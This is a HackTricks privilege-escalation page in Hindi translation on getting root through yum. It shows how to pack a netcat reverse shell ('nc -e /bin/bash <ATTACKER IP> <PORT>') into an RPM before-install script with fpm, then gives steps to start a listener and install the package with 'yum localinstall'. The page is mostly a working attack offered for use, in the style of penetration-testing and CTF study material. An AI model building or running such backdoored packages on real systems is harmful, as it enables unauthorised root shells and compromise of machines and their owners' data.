hacktricks/linux-unix/privilege-escalation/exploiting-yum.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

7.6 KiB

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

yum के आसपास और भी उदाहरण gtfobins पर मिल सकते हैं।

RPM पैकेज के माध्यम से अनियमित कमांड्स को निष्पादित करना

पर्यावरण की जांच करना

इस वेक्टर का उपयोग करने के लिए उपयोगकर्ता को उच्चतर अधिकारी के रूप में yum कमांड्स को निष्पादित करने की क्षमता होनी चाहिए, अर्थात् root.

इस वेक्टर का एक कार्यरत उदाहरण

इस उत्पाद के एक कार्यरत उदाहरण को daily bugle कक्षा पर tryhackme में मिल सकता है।

RPM पैकेज पैक करना

निम्नलिखित खंड में, मैं fpm का उपयोग करके एक RPM में एक रिवर्स शेल पैक करने का वर्णन करूंगा।

नीचे दिए गए उदाहरण में, एक पैकेज बनाया जाता है जिसमें एक before-install ट्रिगर शामिल होता है जिसमें हमलावर द्वारा परिभाषित एक अनियमित स्क्रिप्ट हो सकता है। जब इसे स्थापित किया जाता है, यह पैकेज अनियमित कमांड को निष्पादित करेगा। मैंने उदाहरण के तौर पर एक सरल रिवर्स नेटकैट शेल उदाहरण का उपयोग किया है, लेकिन यह आवश्यकतानुसार बदला जा सकता है।

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

शैल को पकड़ना

ऊपर दिए गए उदाहरण का उपयोग करते हुए और मानते हुए कि yum को एक उच्च-अधिकारी उपयोगकर्ता के रूप में निष्पादित किया जा सकता है।

  1. rpm को होस्ट पर स्थानांतरित करें
  2. अपने स्थानीय होस्ट पर एक लिस्टनर जैसे कि उदाहरण नेटकैट लिस्टनर शुरू करें
  3. विकल्पी पैकेज yum localinstall -y exploited-1.0-1.noarch.rpm को स्थापित करें
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥